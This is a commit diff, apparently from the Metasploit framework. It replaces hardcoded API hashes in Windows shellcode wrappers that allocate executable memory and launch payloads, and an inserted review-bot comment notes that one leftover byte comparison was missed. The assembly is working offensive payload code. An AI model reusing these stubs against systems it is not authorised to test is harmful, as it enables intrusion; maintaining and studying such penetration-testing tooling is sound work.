fix(payloads): removing hardcoded block-api hashes
dledda-r7 committed Nov 22, 2024
1 parent d5bcd50 commit 37d5b90
Showing 1 changed file with 9 additions and 9 deletions.
18 changes: 9 additions & 9 deletions lib/msf/util/exe.rb
@@ -1777,15 +1777,15 @@ def self.win32_rwx_exec(code)
; Note: Execution is not expected to (successfully) continue past this block
exitfunk:
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} ; The EXITFUNK as specified by user...
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')} ; hash( "kernel32.dll", "GetVersion" )
mov eax, ebp
call eax ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
jl goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne goodbye ;
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: ; We now perform the actual call to the exit function
push byte 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
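Review bot: The `cmp bl, 0xE0` five instructions after `exitfunk:` still hard-codes the low byte of the old literal 0x0A2A1DE0, so this hunk only half removes the constant it set out to remove: `mov ebx` now takes the computed ExitThread hash, but the branch that decides whether to substitute RtlExitUserThread compares against a frozen byte and would silently stop matching if the hash routine or its inputs ever changed (it only works today on the assumption that block_api_hash reproduces the old value). Derive the byte from the same call, e.g. `cmp bl, #{Integer(Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')) & 0xFF}` (`Integer()` covers either an Integer or a "0x…" string return), which keeps the 3-byte imm8 encoding and the shellcode size. The identical check is left unchanged in the `win32_rwx_exec_thread` hunk below. The retained comment `; The EXITFUNK as specified by user...` is also misleading now that the function is fixed to ExitThread in both places; `; EXITFUNK: kernel32!ExitThread (swapped for ntdll!RtlExitUserThread below on Vista+)` would match the code. Both enclosing Ruby methods begin and end outside the hunks.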
@@ -1808,7 +1808,7 @@ def self.win32_rwx_exec(code)
push 0x1000 ; MEM_COMMIT
push esi ; Push the length value of the wrapped code block
push byte 0 ; NULL as we dont care where the allocation is.
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
mov ebx, eax ; Store allocated address in ebx
@@ -1887,14 +1887,14 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
; Note: Execution is not expected to (successfully) continue past this block
exitfunk:
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')} ; The EXITFUNK as specified by user...
push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')} ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
jl goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne goodbye ;
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: ; We now perform the actual call to the exit function
push byte 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
@@ -1918,7 +1918,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
push 0x1000 ; MEM_COMMIT
push esi ; Push the length value of the wrapped code block
push byte 0 ; NULL as we dont care where the allocation is.
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
mov ebx, eax ; Store allocated address in ebx
@@ -1943,7 +1943,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
push ebx ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
push eax ; SIZE_T dwStackSize (0 for default)
push eax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateThread')} ; hash( "kernel32.dll", "CreateThread" )
call ebp ; Spawn payload thread
pop eax ; Skip